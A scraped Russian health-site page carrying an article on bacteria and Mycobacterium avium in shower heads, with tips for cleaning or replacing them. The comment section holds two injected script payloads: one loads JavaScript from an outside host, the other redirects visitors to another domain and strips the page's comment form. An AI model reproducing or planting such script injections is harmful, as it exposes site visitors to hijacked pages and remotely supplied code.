Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Душевые головки убивают л...  >>  Душевые головки убивают людей! Что делать?
 
Обратная связь
 

Душевые головки убивают людей! Что делать?

Размер шрифта
01 октября 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Душ – неотъемлемая часть жизни большинства людей. Но и он может оказаться не таким уж безопасным: по мнению ученых, душевая головка – одно из любимых мест обитания микроорганизмов.

Душевые головки убивают людей! Что делать?

Если вы давно не меняли или хотя бы не чистили душевую головку, то вместе с водой из нее на вашу голову льются еще и микробы.

Бактерии на насадке для душа могут собираться вместе и формировать так называемую биопленку – тонкую колонию микроорганизмов. Если ваша иммунная система ослаблена, ежедневный «спрей» из бактерий в душе может привести к возникновению серьезных проблем со здоровьем. По данным исследования, проведенного в Университете Болдера, Колорадо, примерно треть всех душевых головок содержит потенциально опасные виды микроорганизмов.

Одной из таких бактерий, которая с удовольствием растет и размножается в теплой, темной и влажной среде ванной комнаты, является mycobacterium avium. Эта микобактерия может вызывать тяжелое заболевание легких.

Однако не стоит волноваться, ведь существуют два простых способа решения этой проблемы:

1) Чистите душевую головку следующим образом: в пластиковый пакет налейте чашку белого дистиллированного уксуса и насыпьте полчашки пищевой соды. Обвяжите пакет вокруг головки душа и оставьте на час. Если головка легко снимается, промойте ее в таком же растворе, а также хорошо очистите с помощью старой зубной щетки. Используя небольшие острые предметы вроде иголок и булавок можно избавиться от загрязнений в отверстиях душевой головки. 

2) Если душевая головка служит вам уже очень долго – замените ее новой. Будет даже лучше, если вы смените разбрызгивающую насадку той, которая создает одну общую струю.

Эти простые правила помогут вам не бояться подхватить инфекцию и безопасно наслаждаться бодрящим душем каждый день.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:32

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:28

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Оказывается, всего 2 черты лица могут внушить вам доверие! На что смотреть, чтобы не попасться мошенникам!   Родители!!! Мы все ошибались! Ученые доказали, что компьютерные игры стимулируют чтение!   Селфи убивает больше людей, чем акулы!   Всемирная неделя первичного иммунодефицита начинается в Москве!  
03 октября 2013Результаты благотворительного марафона «Всем миром» 08 июля 2013Теперь можно выбрать, какой ребенок у вас будет! ЭКО открывает новые горизонты
 
18 июня 2013Повезло, живете в пешей доступности от шоссе? Не так быстро! Чем ближе к шоссе, тем больнее почки! Как защитить себя? 12 июня 2013Обычный шум может вызвать остановку сердца! Как избежать этого?
 

Слайдшоу

1
5 мест, которые надо мыть, если не хотите болеть весь год
Может ли головная боль привести к смерти
Можно ли пережить беременность без рвоты?

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.